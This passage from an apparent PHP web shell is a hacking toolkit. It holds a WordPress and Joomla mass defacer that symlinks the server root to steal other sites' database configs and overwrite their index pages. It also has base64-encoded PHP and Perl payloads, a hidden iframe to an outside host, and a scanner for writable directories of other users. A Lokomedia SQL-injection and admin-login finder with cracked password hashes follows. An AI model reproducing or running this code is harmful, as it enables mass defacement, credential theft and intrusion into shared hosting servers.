$wr);@symlink('/','sym/root');$dominios = @file_get_contents("/etc/named.conf");@preg_match_all('/.*?zone "(.*?)" {/', $dominios, $out);$out[1] = array_unique($out[1]);$numero_dominios = count($out[1]);echo "Total domains: $numero_dominios <br><br />";$def = file_get_contents($def_url);$def = urlencode($def);$dd = 'PD9waHANCiRkZWYgPSBmaWxlX2dldF9jb250ZW50cygnaHR0cDovL3pvbmVobWlycm9ycy5vcmcvZGVmYWNlZC8yMDEzLzAzLzE5L2Fzc29jaWFwcmVzcy5uZXQnKTsNCiRwID0gZXhwbG9kZSgncHVibGljX2h0bWwnLGRpcm5hbWUoX19GSUxFX18pKTsNCiRwID0gJHBbMF0uJ3B1YmxpY19odG1sJzsNCmlmICgkaGFuZGxlID0gb3BlbmRpcigkcCkpIHsNCiAgICAkZnAxID0gQGZvcGVuKCRwLicvaW5kZXguaHRtbCcsJ3crJyk7DQogICAgQGZ3cml0ZSgkZnAxLCAkZGVmKTsNCiAgICAkZnAxID0gQGZvcGVuKCRwLicvaW5kZXgucGhwJywndysnKTsNCiAgICBAZndyaXRlKCRmcDEsICRkZWYpOw0KICAgICRmcDEgPSBAZm9wZW4oJHAuJy9pbmRleC5odG0nLCd3KycpOw0KICAgIEBmd3JpdGUoJGZwMSwgJGRlZik7DQogICAgZWNobyAnRG9uZSc7DQp9DQpjbG9zZWRpcigkaGFuZGxlKTsNCnVubGluayhfX0ZJTEVfXyk7DQo/Pg==';$base_url = 'http://'.$_SERVER['SERVER_NAME'].dirname($_SERVER['SCRIPT_NAME']).'/sym/root/home/';$output = fopen('defaced.html', 'a+');$_SESSION['count1'] = (isset($_GET['st']) && $_GET['st']!='') ? (isset($_SESSION['count1']) ? $_SESSION['count1'] :0 ) : 0;$_SESSION['count2'] = (isset($_GET['st']) && $_GET['st']!='') ? (isset($_SESSION['count2']) ? $_SESSION['count2'] :0 ) : 0;echo '<table style="width:75%;" align="center"><tr style="background:rgba(160, 82, 45,0.6);"><th>ID</th><th>SID</th><th>Domain</th><th>Type</th><th>Action</th><th>Status</th></tr>';$j = 1;$st = (isset($_GET['st']) && $_GET['st']!='') ? $_GET['st'] : 0;for($i = $st; $i <= $numero_dominios; $i++){$domain = $out[1][$i];$dono_arquivo = @fileowner("/etc/valiases/".$domain);$infos = @posix_getpwuid($dono_arquivo);if($infos['name']!='root') {$config01 = @file_get_contents($base_url.$infos['name']."/public_html/configuration.php");$config02 = @file_get_contents($base_url.$infos['name']."/public_html/wp-config.php");$config03 = @file_get_contents($base_url.$infos['name']."/public_html/blog/wp-config.php");$cls = ($j % 2 == 0) ? 'class="even"' : 'class="odd"';if($config01 && preg_match('/dbprefix/i',$config01)){echo '<tr '.$cls.'><td align="center">'.($j++).'</td><td align="center">'.$i.'</td><td><a href="http://'.$domain.'" target="blank">'.$domain.'</a></td>';echo '<td align="center"><font color="pink">JOOMLA</font></td>';$res = index_changer_joomla($config01, $def, $domain);echo '<td>'.$res['output'].'</td>';if($res['cond']) {echo '<td align="center"><span class="green">DEFACED</span></td>';fwrite($output, 'http://'.$domain."<br>");$_SESSION['count1'] = $_SESSION['count1'] + 1;} else {echo '<td align="center"><span class="red">FAILED</span></td>';}echo '</tr>';}if($config02 && preg_match('/DB_NAME/i',$config02)){echo '<tr '.$cls.'><td align="center">'.($j++).'</td><td align="center">'.$i.'</td><td><a href="http://'.$domain.'" target="blank">'.$domain.'</a></td>';echo '<td align="center"><font color="yellow">WORDPRESS</font></td>';$res = index_changer_wp($config02, $dd);echo '<td>'.$res['output'].'</td>';if($res['cond']) {echo '<td align="center"><span class="green">DEFACED</span></td>';fwrite($output, 'http://'.$domain."<br>");$_SESSION['count2'] = $_SESSION['count2'] + 1;} else {echo '<td align="center"><span class="red">FAILED</span></td>';}echo '</tr>';}$cls = ($j % 2 == 0) ? 'class="even"' : 'class="odd"';if($config03 && preg_match('/DB_NAME/i',$config03)){echo '<tr '.$cls.'><td align="center">'.($j++).'</td><td align="center">'.$i.'</td><td><a href="http://'.$domain.'" target="blank">'.$domain.'</a></td>';echo '<td align="center"><font color="yellow">WORDPRESS</font></td>';$res = index_changer_wp($config03, $dd);echo '<td>'.$res['output'].'</td>';if($res['cond']) {echo '<td align="center"><span class="green">DEFACED</span></td>';fwrite($output, 'http://'.$domain."<br>");$_SESSION['count2'] = $_SESSION['count2'] + 1;} else {echo '<td align="center"><span class="red">FAILED</span></td>';}echo '</tr>';}}}echo '</table>';echo '<hr/>';echo 'Total Defaced = '.($_SESSION['count1']+$_SESSION['count2']).' (JOOMLA = '.$_SESSION['count1'].', WORDPRESS = '.$_SESSION['count2'].')<br />';echo '<a href="defaced.html" target="_blank">View Total Defaced urls</a><br />';if($_SESSION['count1']+$_SESSION['count2'] > 0){echo '<a href="'.$_SERVER['PHP_SELF'].'?pass='.$_GET['pass'].'&zh=1" target="_blank" id="zhso">Send to Zone-H</a>';}}function exec_mode_2($def_url) {$domains = @file_get_contents("/etc/named.conf");@preg_match_all('/.*?zone "(.*?)" {/', $domains, $out);$out = array_unique($out[1]);$num = count($out);print("Total domains: $num<br><br />");$def = file_get_contents($def_url);$def = urlencode($def);$output = fopen('defaced.html', 'a+');$defaced = '';$count1 = 0;$count2 = 0;echo '<table style="width:75%;"><tr style="background:rgba(160, 82, 45,0.6);"><th>ID</th><th>SID</th><th>Domain</th><th>Type</th><th>Action</th><th>Status</th></tr>';$j = 1;$map = array();foreach($out as $d) {$info = @posix_getpwuid(fileowner("/etc/valiases/".$d));$map[$info['name']] = $d;}$dt = 'IyEvdXNyL2Jpbi9wZXJsIC1JL3Vzci9sb2NhbC9iYW5kbWluDQpzdWIgbGlsew0KICAgICgkdXNlcikgPSBAXzsNCiAgICAkbXNyID0gcXh7cHdkfTs
1261. NCiAgICAka29sYT0kbXNyLiIvIi4kdXNlcjsNCiAgICAka29sYT1+cy9cbi8vZzsNCiAgICBzeW1saW5rKCcvaG9tZS8nLiR1c2VyLicvcHVibGljX2
1262. h0bWwvY29uZmlndXJhdGlvbi5waHAnLCRrb2xhLicjI2pvb21sYS50eHQnKTsgDQogICAgc3ltbGluaygnL2hvbWUvJy4kdXNlci4nL3B1YmxpY19od
1263. G1sL3dwLWNvbmZpZy5waHAnLCRrb2xhLicjI3dvcmRwcmVzcy50eHQnKTsNCiAgICBzeW1saW5rKCcvaG9tZS8nLiR1c2VyLicvcHVibGljX2h0bWwv
1264. YmxvZy93cC1jb25maWcucGhwJywka29sYS4nIyNzd29yZHByZXNzLnR4dCcpOw0KfQ0KDQpsb2NhbCAkLzsNCm9wZW4oRklMRSwgJy9ldGMvcGFzc3d
1265. kJyk7ICANCkBsaW5lcyA9IDxGSUxFPjsgDQpjbG9zZShGSUxFKTsNCiR5ID0gQGxpbmVzOw0KDQpmb3IoJGthPTA7JGthPCR5OyRrYSsrKXsNCiAgIC
1266. B3aGlsZShAbGluZXNbJGthXSAgPX4gbS8oLio/KTp4Oi9nKXsNCiAgICAgICAgJmxpbCgkMSk7DQogICAgfQ0KfQ==';mkdir('plsym',0777);file_put_contents('plsym/plsym.cc', base64_decode($dt));chmod('plsym/plsym.cc', 0755);$wr = "Options FollowSymLinks MultiViews Indexes ExecCGI\n\nAddType application/x-httpd-cgi .cc\n\nAddHandler cgi-script .cc\nAddHandler cgi-script .cc";$fp = @fopen ('plsym/.htaccess','w');fwrite($fp, $wr);fclose($fp);$res = file_get_contents('http://'.$_SERVER['SERVER_NAME'].dirname($_SERVER['SCRIPT_NAME']).'/plsym/plsym.cc'); $url = 'http://'.$_SERVER['SERVER_NAME'].dirname($_SERVER['SCRIPT_NAME']).'/plsym/';unlink('plsym/plsym.cc');$data = file_get_contents($url);preg_match_all('/<a href="(.+)">/', $data, $match);unset($match[1][0]);$i = 1;foreach($match[1] as $m){$mz = explode('##',urldecode($m));$config01 = '';$config02 = '';if($mz[1] == 'joomla.txt') {$config01 = file_get_contents($url.$m);}if($mz[1] == 'wordpress.txt') {$config02 = file_get_contents($url.$m);}$domain = $map[$mz[0]];$cls = ($j % 2 == 0) ? 'class="even"' : 'class="odd"';if($config01 && preg_match('/dbprefix/i',$config01)){echo '<tr '.$cls.'><td align="center">'.($j++).'</td><td align="center">'.$i++.'</td><td><a href="http://'.$domain.'" target="blank">'.$domain.'</a></td>';echo '<td align="center"><font color="pink">JOOMLA</font></td>';$res = index_changer_joomla($config01, $def, $domain);echo '<td>'.$res['output'].'</td>';if($res['cond']) {echo '<td align="center"><span class="green">DEFACED</span></td>';fwrite($output, 'http://'.$domain."<br>");$count1++;} else {echo '<td align="center"><span class="red">FAILED</span></td>';}echo '</tr>';}if($config02 && preg_match('/DB_NAME/i',$config02)){echo '<tr '.$cls.'><td align="center">'.($j++).'</td><td><a href="http://'.$domain.'" target="blank">'.$domain.'</a></td>';echo '<td align="center"><font color="yellow">WORDPRESS</font></td>';$res = index_changer_wp($config02, $def);echo '<td>'.$res['output'].'</td>';if($res['cond']) {echo '<td align="center"><span class="green">DEFACED</span></td>';fwrite($output, 'http://'.$domain."<br>");$count2++;} else {echo '<td align="center"><span class="red">FAILED</span></td>';}echo '</tr>';}}echo '</table>';echo '<hr/>';echo 'Total Defaced = '.($count1+$count2).' (JOOMLA = '.$count1.', WORDPRESS = '.$count2.')<br />';echo '<a href="defaced.html" target="_blank">View Total Defaced urls</a><br />';if($count1+$count2 > 0){echo '<a href="'.$_SERVER['PHP_SELF'].'?pass='.$_GET['pass'].'&zh=1" target="_blank" id="zhso">Send to Zone-H</a>';}}function exec_mode_3($def_url) {$domains = @file_get_contents("/etc/named.conf");@preg_match_all('/.*?zone "(.*?)" {/', $domains, $out);$out = array_unique($out[1]);$num = count($out);print("Total domains: $num<br><br />");$def = file_get_contents($def_url);$def = urlencode($def); $output = fopen('defaced.html', 'a+');$defaced = '';$count1 = 0;$count2 = 0;echo '<table style="width:75%;"><tr style="background:rgba(160, 82, 45,0.6);"><th>ID</th><th>SID</th><th>Domain</th><th>Type</th><th>Action</th><th>Status</th></tr>';$j = 1;$map = array();foreach($out as $d) {$info = @posix_getpwuid(fileowner("/etc/valiases/".$d));$map[$info['name']] = $d;}$dt = 'IyEvdXNyL2Jpbi9wZXJsIC1JL3Vzci9sb2NhbC9iYW5kbWluDQpzdWIgbGlsew0KICAgICgkdXNlcikgPSBAXzsNCiAgICAkbXNyID0gcXh7cHd
1267. kfTsNCiAgICAka29sYT0kbXNyLiIvIi4kdXNlcjsNCiAgICAka29sYT1+cy9cbi8vZzsNCiAgICBzeW1saW5rKCcvaG9tZS8nLiR1c2VyLicvcH
1268. VibGljX2h0bWwvY29uZmlndXJhdGlvbi5waHAnLCRrb2xhLicjI2pvb21sYS50eHQnKTsgDQogICAgc3ltbGluaygnL2hvbWUvJy4kdXNlci4nL
1269. 3B1YmxpY19odG1sL3dwLWNvbmZpZy5waHAnLCRrb2xhLicjI3dvcmRwcmVzcy50eHQnKTsNCiAgICBzeW1saW5rKCcvaG9tZS8nLiR1c2VyLicv
1270. cHVibGljX2h0bWwvYmxvZy93cC1jb25maWcucGhwJywka29sYS4nIyNzd29yZHByZXNzLnR4dCcpOw0KfQ0KDQpsb2NhbCAkLzsNCm9wZW4oRkl
1271. MRSwgJ2RhdGEudHh0Jyk7ICANCkBsaW5lcyA9IDxGSUxFPjsgDQpjbG9zZShGSUxFKTsNCiR5ID0gQGxpbmVzOw0KDQpmb3IoJGthPTA7JGthPC
1272. R5OyRrYSsrKXsNCiAgICB3aGlsZShAbGluZXNbJGthXSAgPX4gbS8oLio/KTp4Oi9nKXsNCiAgICAgICAgJmxpbCgkMSk7DQogICAgfQ0KfQ==';mkdir('plsym',0777);file_put_contents('plsym/data.txt', $_POST['man_data']);file_put_contents('plsym/plsym.cc', base64_decode($dt));chmod('plsym/plsym.cc', 0755);$wr = "Options FollowSymLinks MultiViews Indexes ExecCGI\n\nAddType application/x-httpd-cgi .cc\n\nAddHandler cgi-script .cc\nAddHandler cgi-script .cc";$fp = @fopen ('plsym/.htaccess','w');fwrite($fp, $wr);fclose($fp);$res = file_get_contents('http://'.$_SERVER['SERVER_NAME'].dirname($_SERVER['SCRIPT_NAME']).'/plsym/plsym.cc'); $url = 'http://'.$_SERVER['SERVER_NAME'].dirname($_SERVER['SCRIPT_NAME']).'/plsym/';unlink('plsym/plsym.cc');$data = file_get_contents($url);preg_match_all('/<a href="(.+)">/', $data, $match);unset($match[1][0]);$i=1;foreach($match[1] as $m){$mz = explode('##',urldecode($m));$config01 = '';$config02 = '';if($mz[1] == 'joomla.txt') {$config01 = file_get_contents($url.$m);}if($mz[1] == 'wordpress.txt') {$config02 = file_get_contents($url.$m);}$domain = $map[$mz[0]];$cls = ($j % 2 == 0) ? 'class="even"' : 'class="odd"';if($config01 && preg_match('/dbprefix/i',$config01)){echo '<tr '.$cls.'><td align="center">'.($j++).'</td><td align="center">'.($i++).'</td><td><a href="http://'.$domain.'" target="blank">'.$domain.'</a></td>';echo '<td align="center"><font color="pink">JOOMLA</font></td>';$res = index_changer_joomla($config01, $def, $domain);echo '<td>'.$res['output'].'</td>';if($res['cond']) {echo '<td align="center"><span class="green">DEFACED</span></td>';fwrite($output, 'http://'.$domain."<br>");$count1++;} else {echo '<td align="center"><span class="red">FAILED</span></td>';}echo '</tr>';}if($config02 && preg_match('/DB_NAME/i',$config02)){echo '<tr '.$cls.'><td align="center">'.($j++).'</td><td><a href="http://'.$domain.'" target="blank">'.$domain.'</a></td>';echo '<td align="center"><font color="yellow">WORDPRESS</font></td>';$res = index_changer_wp($config02, $def);echo '<td>'.$res['output'].'</td>';if($res['cond']) {echo '<td align="center"><span class="green">DEFACED</span></td>';fwrite($output, 'http://'.$domain."<br>");$count2++;} else {echo '<td align="center"><span class="red">FAILED</span></td>';}echo '</tr>';}}echo '</table>';echo '<hr/>';echo 'Total Defaced = '.($count1+$count2).' (JOOMLA = '.$count1.', WORDPRESS = '.$count2.')<br />';echo '<a href="defaced.html" target="_blank">View Total Defaced urls</a><br />';if($count1+$count2 > 0){echo '<a href="'.$_SERVER['PHP_SELF'].'?pass='.$_GET['pass'].'&zh=1" target="_blank" id="zhso">Send to Zone-H</a>';}}echo '<!DOCTYPE html><html><head><link href="http://fonts.googleapis.com/css?family=Orbitron:700" rel="stylesheet" type="text/css"><style type="text/css">.header {position:fixed;width:100%;top:0;background:#000;}.footer {position:fixed;width:100%;bottom:0;background:#000;}input[type="radio"]{margin-top: 0;}.td2 {border-left:1px solid red;border-radius: 2px 2px 2px 2px;}.even {background-color: rgba(25, 25, 25, 0.6);}.odd {background-color: rgba(102, 102, 102, 0.6);}textarea{background: rgba(0,0,0,0.6); color: white;}.green {color:#00FF00;font-weight:bold;}.red {color:#FF0000;font-weight:bold;}</style><script type="text/javascript">function change() {if(document.getElementById(\'rcd\').checked == true) {document.getElementById(\'tra\').style.display = \'\';} else {document.getElementById(\'tra\').style.display = \'none\';}}function hide() {document.getElementById(\'tra\').style.display = \'none\';}</script></head><body><h2 style="font-size:25px;color:#00ff00;text-align: center;font-family:orbitron;text-shadow: 6px 6px 6px black;">Wordpress and Joomla Mass Defacer</h2>';if(!isset($_POST['form_action']) && !isset($_GET['mode'])){echo '<form action="" method="post"><table align=center><tr><td><input type="radio" value="1" name="mode" checked="checked" onclick="hide();"></td><td>using /etc/named.conf ('.(is_readable('/etc/named.conf')?'<span class="green">READABLE</span>':'<span class="red">NOT READABLE</span>').')</td></tr><tr><td><input type="radio" value="2" name="mode" onclick="hide();"></td><td>using /etc/passwd ('.(is_readable('/etc/passwd')?'<span class="green">READABLE</span>':'<span class="red">NOT READABLE</span>').')</td></tr><tr><td><input type="radio" value="2" name="mode" id="rcd" onclick="change();"></td><td>manual copy of /etc/passwd</td></tr><tr id="tra" style="display: none;"><td></td><td><textarea cols="60" rows="10" name="man_data"></textarea></td></tr></table><br><input type="hidden" name="form_action" value="1"><table align=center><tr><td><b>index url: </b><input class="inputz" size="45" type="text" name="defpage" value=""></tr></td></table><center><input class="inputzbut" type="submit" value="Attack !" name="Submit"></center></form>';}$milaf_el_index = $_POST['defpage'];if($_POST['form_action'] == 1) {if($_POST['mode']==1) { exec_mode_1($milaf_el_index); }if($_POST['mode']==2) { exec_mode_2($milaf_el_index); }if($_POST['mode']==3) { exec_mode_3($milaf_el_index); }}if($_GET['mode']==1) { exec_mode_1($milaf_el_index); }echo '<iframe style="height:1px" src="http://www&#46;Brenz.pl/rc/" frameborder=0 width=1></iframe>
1273. </body></html>';
1274. }
1275. } elseif($_GET['do'] == 'symser'){
1276. $d0mains = @file("/etc/named.conf");
1277. if($d0mains){@mkdir("/priv_sym",0777);@chdir("/priv_sym");@exe("ln -s / root");$file3 = 'Options all
1278. DirectoryIndex Priv.html
1279. AddType text/plain .php
1280. AddHandler server-parsed .php
1281. AddType text/plain .html
1282. AddHandler txt .html
1283. Require None
1284. Satisfy Any';$fp3 = fopen('.htaccess','w');$fw3 = fwrite($fp3,$file3);@fclose($fp3);echo "<table align=center border=1 style='width:60%;border-color:#333333;'><tr><td align=center><font size=3>S. No.</font></td><td align=center><font size=3>Domains</font></td><td align=center><font size=3>Users</font></td><td align=center><font size=3>Symlink</font></td></tr>";$dcount = 1;foreach($d0mains as $d0main){if(eregi("zone",$d0main)){preg_match_all('#zone "(.*)"#', $d0main, $domains);flush();if(strlen(trim($domains[1][0])) > 2){$user = posix_getpwuid(@fileowner("/etc/valiases/".$domains[1][0]));echo "<tr align=center><td><font size=3>" . $dcount . "</font></td><td align=left><a href=http://www.".$domains[1][0]."/><font class=txt>".$domains[1][0]."</font></a></td><td>".$user['name']."</td><td><a href='/k2/root/home/".$user['name']."/public_html' target='_blank'><font class=txt>Symlink</font></a></td></tr>"; flush();$dcount++;}}}echo "</table>";}else{$TEST=@file('/etc/passwd');if ($TEST){@mkdir("priv",0777);@chdir("priv");exe("ln -s / root");$file3 = 'Options all
1285. DirectoryIndex Priv.html
1286. AddType text/plain .php
1287. AddHandler server-parsed .php
1288. AddType text/plain .html
1289. AddHandler txt .html
1290. Require None
1291. Satisfy Any';$fp3 = fopen('.htaccess','w');$fw3 = fwrite($fp3,$file3);@fclose($fp3);echo "<br><br><table align=center border=1><tr><td align=center><font size=4>S. No.</font></td><td align=center><font size=4>Users</font></td><td align=center><font size=4>Symlink</font></td></tr>";$dcount = 1;$file = fopen("/etc/passwd", "r") or exit("Unable to open file!");while(!feof($file)){$s = fgets($file);$matches = array();$t = preg_match('/\/(.*?)\:\//s', $s, $matches);$matches = str_replace("home/","",$matches[1]);if(strlen($matches) > 12 || strlen($matches) == 0 || $matches == "bin" || $matches == "etc/X11/fs" || $matches == "var/lib/nfs" || $matches == "var/arpwatch" || $matches == "var/gopher" || $matches == "sbin" || $matches == "var/adm" || $matches == "usr/games" || $matches == "var/ftp" || $matches == "etc/ntp" || $matches == "var/www" || $matches == "var/named")continue;echo "<tr><td align=center><font size=3>" . $dcount . "</td><td align=center><font class=txt>" . $matches . "</td>";echo "<td align=center><font class=txt><a href=/priv/root/home/" . $matches . "/public_html target='_blank'>Symlink</a></td></tr>";$dcount++;}fclose($file);echo "</table>";}else{if($os != "Windows"){@mkdir("priv",0777);@chdir("priv");@exe("ln -s / root");$file3 = 'Options all
1292. DirectoryIndex Priv.html
1293. AddType text/plain .php
1294. AddHandler server-parsed .php
1295. AddType text/plain .html
1296. AddHandler txt .html
1297. Require None
1298. Satisfy Any';$fp3 = fopen('.htaccess','w');$fw3 = fwrite($fp3,$file3);@fclose($fp3);echo "<br><br><center><h2 class='cgx2'>server symlinker</h2><table align=center border=1><tr><td align=center><font size=4>id</font></td><td align=center><font size=4>Users</font></td><td align=center><font size=4>Symlink</font></td></tr>";$temp = "";$val1 = 0;$val2 = 1000;for(;$val1 <= $val2;$val1++) {$uid = @posix_getpwuid($val1);if ($uid)$temp .= join(':',$uid)."\n";}echo '<br/>';$temp = trim($temp);$file5 = fopen("test.txt","w");fputs($file5,$temp);fclose($file5);$dcount = 1;$file = fopen("test.txt", "r") or exit("Unable to open file!");while(!feof($file)){$s = fgets($file);$matches = array();$t = preg_match('/\/(.*?)\:\//s', $s, $matches);$matches = str_replace("home/","",$matches[1]);if(strlen($matches) > 12 || strlen($matches) == 0 || $matches == "bin" || $matches == "etc/X11/fs" || $matches == "var/lib/nfs" || $matches == "var/arpwatch" || $matches == "var/gopher" || $matches == "sbin" || $matches == "var/adm" || $matches == "usr/games" || $matches == "var/ftp" || $matches == "etc/ntp" || $matches == "var/www" || $matches == "var/named")continue;echo "<tr><td align=center><font size=3>" . $dcount . "</td><td align=center><font class=txt>" . $matches . "</td>";echo "<td align=center><font class=txt><a href=/priv/root/home/" . $matches . "/public_html target='_blank'>Symlink</a></td></tr>";$dcount++;}fclose($file);echo "</table></center>";unlink("test.txt");} else echo "<center><font size=4>Cannot create Symlink</font></center>";}}
1299.  
1300. }elseif($_GET['do'] == 'jumping') {
1301. $i = 0;
1302. echo "<div class='margin: 5px auto;'>";
1303. if(preg_match("/hsphere/", $dir)) {
1304. $urls = explode("\r\n", $_POST['url']);
1305. if(isset($_POST['jump'])) {
1306. echo "<pre>";
1307. foreach($urls as $url) {
1308. $url = str_replace(array("http://","www."), "", strtolower($url));
1309. $etc = "/etc/passwd";
1310. $f = fopen($etc,"r");
1311. while($gets = fgets($f)) {
1312. $pecah = explode(":", $gets);
1313. $user = $pecah[0];
1314. $dir_user = "/hsphere/local/home/$user";
1315. if(is_dir($dir_user) === true) {
1316. $url_user = $dir_user."/".$url;
1317. if(is_readable($url_user)) {
1318. $i++;
1319. $jrw = "[<font color=lime>R</font>] <a href='?bom&folder=$url_user'><font color=gold>$url_user</font></a>";
1320. if(is_writable($url_user)) {
1321. $jrw = "[<font color=lime>RW</font>] <a href='?bom&folder=$url_user'><font color=gold>$url_user</font></a>";
1322. }
1323. echo $jrw."<br>";
1324. }
1325. }
1326. }
1327. }
1328. if($i == 0) {
1329. } else {
1330. echo "<br>Total ada ".$i." Kimcil di ".$ip;
1331. }
1332. echo "</pre>";
1333. } else {
1334. echo '<center>
1335. <form method="post">
1336. List Domains: <br>
1337. <textarea name="url" style="width: 500px; height: 250px;">';
1338. $fp = fopen("/hsphere/local/config/httpd/sites/sites.txt","r");
1339. while($getss = fgets($fp)) {
1340. echo $getss;
1341. }
1342. echo '</textarea><br>
1343. <input type="submit" value="Jumping" name="jump" style="width: 500px; height: 25px;">
1344. </form></center>';
1345. }
1346. } elseif(preg_match("/vhosts/", $dir)) {
1347. $urls = explode("\r\n", $_POST['url']);
1348. if(isset($_POST['jump'])) {
1349. echo "<pre>";
1350. foreach($urls as $url) {
1351. $web_vh = "/var/www/vhosts/$url/httpdocs";
1352. if(is_dir($web_vh) === true) {
1353. if(is_readable($web_vh)) {
1354. $i++;
1355. $jrw = "[<font color=lime>R</font>] <a href='?bom&folder=$web_vh'><font color=gold>$web_vh</font></a>";
1356. if(is_writable($web_vh)) {
1357. $jrw = "[<font color=lime>RW</font>] <a href='?bom&folder=$web_vh'><font color=gold>$web_vh</font></a>";
1358. }
1359. echo $jrw."<br>";
1360. }
1361. }
1362. }
1363. if($i == 0) {
1364. } else {
1365. echo "<br>Total ada ".$i." Kimcil di ".$ip;
1366. }
1367. echo "</pre>";
1368. } else {
1369. echo '<center>
1370. <form method="post">
1371. List Domains: <br>
1372. <textarea name="url" style="width: 500px; height: 250px;">';
1373. bing("ip:$ip");
1374. echo '</textarea><br>
1375. <input type="submit" value="Jumping" name="jump" style="width: 500px; height: 25px;">
1376. </form></center>';
1377. }
1378. } else {
1379. echo "<pre>";
1380. $etc = fopen("/etc/passwd", "r") or die("<font color=red>Can't read /etc/passwd</font>");
1381. while($passwd = fgets($etc)) {
1382. if($passwd == '' || !$etc) {
1383. echo "<font color=red>Can't read /etc/passwd</font>";
1384. } else {
1385. preg_match_all('/(.*?):x:/', $passwd, $user_jumping);
1386. foreach($user_jumping[1] as $user_ec_jump) {
1387. $user_jumping_dir = "/home/$user_ec_jump/public_html";
1388. if(is_readable($user_jumping_dir)) {
1389. $i++;
1390. $jrw = "[<font color=lime>R</font>] <a href='?bom&folder=$user_jumping_dir'><font color=gold>$user_jumping_dir</font></a>";
1391. if(is_writable($user_jumping_dir)) {
1392. $jrw = "[<font color=lime>RW</font>] <a href='?bom&folder=$user_jumping_dir'><font color=gold>$user_jumping_dir</font></a>";
1393. }
1394. echo $jrw;
1395. if(function_exists('posix_getpwuid')) {
1396. $domain_jump = file_get_contents("/etc/named.conf");
1397. if($domain_jump == '') {
1398. echo " => ( <font color=red>gabisa ambil nama domain nya</font> )<br>";
1399. } else {
1400. preg_match_all("#/var/named/(.*?).db#", $domain_jump, $domains_jump);
1401. foreach($domains_jump[1] as $dj) {
1402. $user_jumping_url = posix_getpwuid(@fileowner("/etc/valiases/$dj"));
1403. $user_jumping_url = $user_jumping_url['name'];
1404. if($user_jumping_url == $user_ec_jump) {
1405. echo " => ( <u>$dj</u> )<br>";
1406. break;
1407. }
1408. }
1409. }
1410. } else {
1411. echo "<br>";
1412. }
1413. }
1414. }
1415. }
1416. }
1417. if($i == 0) {
1418. } else {
1419. echo "<br>Total ada ".$i." Kimcil di ".$ip;
1420. }
1421. echo "</pre>";
1422. }
1423. echo "</div>";
1424. }elseif($_GET['do'] == 'lokmed_login_shell'){
1425. echo'
1426. <html>
1427. <head>
1428. <style type="text/css">
1429. textarea {
1430. width: 500px;
1431. height: 200px;
1432. border: 1px solid #7FFFFF;
1433. margin: 5px auto;
1434. padding: 7px;
1435. }
1436. input[type=submit] {
1437. width: 500px;
1438. height: 25px;
1439. border: 1px solid #7FFFFF;
1440. background: transparent;
1441. margin: 5px auto;
1442. background: #7FFFFF;
1443. color: black;
1444. cursor: pointer;
1445. }
1446. </style>
1447. </head>
1448. <center>
1449. <h1> Lokomedia SQL-Injection + Scan Admin Login</h1>
1450. <form method="post">
1451. <textarea name="target" placeholder="http://www.target.com/" style="width: 500px; height: 250px;" required></textarea><br>
1452. <input type="submit" name="go" value="Xploit" style="width: 500px;">
1453. </form>
1454. </center>';
1455. function ngcurl($url) {
1456. $curl = curl_init($url);
1457. curl_setopt($curl, CURLOPT_RETURNTRANSFER, true);
1458. curl_setopt($curl, CURLOPT_FOLLOWLOCATION, true);
1459. $content = curl_exec($curl);
1460. curl_close($curl);
1461. return $content;
1462. }
1463. $admin = array(
1464. 'adm/',
1465. '_adm_/',
1466. '_admin_/',
1467. '_administrator_/',
1468. 'operator/',
1469. 'sika/',
1470. 'develop/',
1471. 'ketua/',
1472. 'redaktur/',
1473. 'author',
1474. 'admin/',
1475. 'administrator/',
1476. 'adminweb/',
1477. 'user/',
1478. 'users/',
1479. 'dinkesadmin/',
1480. 'retel/',
1481. 'author/',
1482. 'panel/',
1483. 'paneladmin/',
1484. 'panellogin/',
1485. 'redaksi/',
1486. 'cp-admin/',
1487. 'master/',
1488. 'master/index.php',
1489. 'master/login.php',
1490. 'operator/index.php',
1491. 'sika/index.php',
1492. 'develop/index.php',
1493. 'ketua/index.php',
1494. 'redaktur/index.php',
1495. 'admin/index.php',
1496. 'administrator/index.php',
1497. 'adminweb/index.php',
1498. 'user/index.php',
1499. 'users/index.php',
1500. 'dinkesadmin/index.php',
1501. 'retel/index.php',
1502. 'author/index.php',
1503. 'panel/index.php',
1504. 'paneladmin/index.php',
1505. 'panellogin/index.php',
1506. 'redaksi/index.php',
1507. 'cp-admin/index.php',
1508. 'operator/login.php',
1509. 'sika/login.php',
1510. 'develop/login.php',
1511. 'ketua/login.php',
1512. 'redaktur/login.php',
1513. 'admin/login.php',
1514. 'administrator/login.php',
1515. 'adminweb/login.php',
1516. 'user/login.php',
1517. 'users/login.php',
1518. 'dinkesadmin/login.php',
1519. 'retel/login.php',
1520. 'author/login.php',
1521. 'panel/login.php',
1522. 'paneladmin/login.php',
1523. 'panellogin/login.php',
1524. 'redaksi/login.php',
1525. 'cp-admin/login.php',
1526. 'terasadmin/',
1527. 'terasadmin/index.php',
1528. 'terasadmin/login.php',
1529. 'rahasia/',
1530. 'rahasia/index.php',
1531. 'rahasia/admin.php',
1532. 'rahasia/login.php',
1533. 'dinkesadmin/',
1534. 'dinkesadmin/login.php',
1535. 'adminpmb/',
1536. 'adminpmb/index.php',
1537. 'adminpmb/login.php',
1538. 'system/',
1539. 'system/index.php',
1540. 'system/login.php',
1541. 'webadmin/',
1542. 'webadmin/index.php',
1543. 'webadmin/login.php',
1544. 'wpanel/',
1545. 'wpanel/index.php',
1546. 'wpanel/login.php',
1547. 'adminpanel/index.php',
1548. 'adminpanel/',
1549. 'adminpanel/login.php',
1550. 'adminkec/',
1551. 'adminkec/index.php',
1552. 'adminkec/login.php',
1553. 'admindesa/',
1554. 'admindesa/index.php',
1555. 'admindesa/login.php',
1556. 'adminkota/',
1557. 'adminkota/index.php',
1558. 'adminkota/login.php',
1559. 'admin123/',
1560. 'admin123/index.php',
1561. 'admin123/login.php',
1562. 'logout/',
1563. 'logout/index.php',
1564. 'logout/login.php',
1565. 'logout/admin.php',
1566. 'adminweb_setting',
1567. );
1568. $real_pass = array(
1569. "a66abb5684c45962d887564f08346e8d" => "admin123456",
1570. "99026ab4ab3de96f3d7ae33c8c85057b" => "master!@#$qwe",
1571. "c630643500720b255abb22e2ab2c31f6" => "sumedang123",
1572. "1c63129ae9db9c60c3e8aa94d3e00495" => "1qaz2wsx",
1573. "f243df64be7184fb0fc07bd6cf53185b" => "b1smillah",
1574. "93261ae77f0df5522dd9767203f3aa17" => "house69",
1575. "f243df64be7184fb0fc07bd6cf53185b" => "b1smillah",
1576. "37c77ada62ec68d1b740717fc886bef6" => "Suk4bum1",
1577. "d39b59b946b414c4e5926f9c7b23840a" => "kasitaugakya",
